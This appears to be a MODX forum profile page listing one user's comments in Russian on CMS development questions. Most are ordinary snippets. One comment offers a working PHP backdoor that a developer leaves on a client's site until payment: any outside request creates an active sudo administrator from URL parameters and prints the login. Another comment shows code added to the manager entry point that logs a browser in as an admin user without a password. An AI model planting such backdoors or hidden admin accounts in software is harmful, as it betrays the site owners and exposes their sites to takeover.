Владимир

С нами с 28 декабря 2012; Место в рейтинге пользователей: #82

Написать сообщение

Заметки ¹⁸⁹
Комментарии ³²⁹

Максим Кузнецов

24 января 2017, 00:43

Аналогично, бэкдор + сайт лежит на своем хостинге до оплаты оставшейся части. Вот код:

<?php
	define('MODX_API_MODE', true);
	//количество dirname = глубина документа относительно корня
	require dirname(dirname(dirname(dirname(__FILE__)))) . '/index.php';

	$user = empty($_GET['user']) ? 'user'. rand(99,9999) : $_GET['user'];
	$pass = empty($_GET['pass']) ? rand(10000000,99999999) : $_GET['pass'];
	
	$u = $modx->newObject('modUser');
	$u->fromArray(array(
		'username' => $user,
		'password' => $pass,
		'active' => 1,
		'primary_group' => 1,
	));
	$u->joinGroup('1', '0');
	$u->setSudo(1);
	$p = $modx->newObject('modUserProfile');
	$p->fromArray(array(
		'fullname' => $user,
		'email' => $user.'@yoba.ru',
	));
	$u->addOne($p);
	$u->save();
	
	if (!empty($u->username)) {
		print '<p><b>user:</b> '. $user .'</p><p><b>pass:</b> '. $pass .'</p>';
	}

— при запросе к документу генерирует и выводит логин-пароль для свежесозданного sudo-пользователя. (соответственно, файл должен быть доступен извне)

По поводу взлома можешь обратиться к agel_nash, наверное.

Вопросы

Можно ли взломать сайт на MODX? 17

Сергей Шлоков

23 января 2017, 22:13

Кто короче :)

collection('modContext')->each(function($context){echo $context['key'];});

Вопросы

Список всех контекстов 25

Максим Кузнецов

23 января 2017, 20:38

$contexts = $modx->getCollection('modContext', array('key:!=' => 'mgr'));

foreach($contexts as $context) {
	echo $context->key;
}

Вопросы

Список всех контекстов 25

Павел Романов

23 января 2017, 19:54

Как-то так:

<?php
$contexts = $modx->getCollection('modContext', array('key:NOT IN' => array('mgr')));
foreach($contexts as $cx) {
    if($cx->prepare()) {
        echo $cx->key.', ';
    }
}

Вопросы

Список всех контекстов 25

Володя

22 января 2017, 21:55

просто укажи

&sortby=`COALESCE(clock.price,9999999999)`

Вопросы

pdoResources сортировка по TV 4

Fi1osof

16 января 2017, 03:46

В manager/index.php сразу после $modx->initialize(); пишете:

$modx->user = $modx->getObject("modUser", $admin_user_id);
$modx->user->sudo = 1;
$modx->user->addSessionContext("mgr");

И обновляете страницу админки.
Если не поможет, то совсем плохо дела.

А вообще проверьте системные настройки site_url|manager_url или типа того, returnUrl у вас сбитый joxi.ru/eAOqaVNfx9jojm (но это так, на всякий случай). Но скорее всего проблема просто в том, что у вас кукисы двоятся. Не экспериментировали с указанием домена для кукисов? То есть авторизация проходит, и страница обновляется (что нормально), но сессия не держится.

Вопросы

Не входит в админку Revo 2.4.4 18

Алексей Ерохин

10 января 2017, 15:06

github.com/modxcms/revolution/issues/13243
нужно дать разрешение view_template для группы

Вопросы

После обновления modx до 2.5.4 и появл. ошибка 3

Наумов Алексей

08 января 2017, 11:44

modx.pro/development/3713-ms2gallery-source-files-for-different-templates/

Объявления о работе

Плагин соответствия источников файлов шаблонам 4

Виталий Батушев

29 декабря 2016, 07:52

Давно променял Vapor на Teleport.
Удобно как раз для переносов сайтов и для бэкапов прекрасно — все в одном файле получается.
Минус только в одном: после inject-а нужно обновить (переустановить) несколько плагинов: MIGX, Ace, CKEditor.
«Традиционный» бэкап делаю только в силу благоприобретенной паранойи.

Для разработчиков

Практика резервного копирования на MODX 20

Василий Наумкин

02 декабря 2016, 18:52

Попробуй в скобочках:

{if ('1' in list $compl)}

Вопросы

Как в Fenom проверить наличие в массиве? 8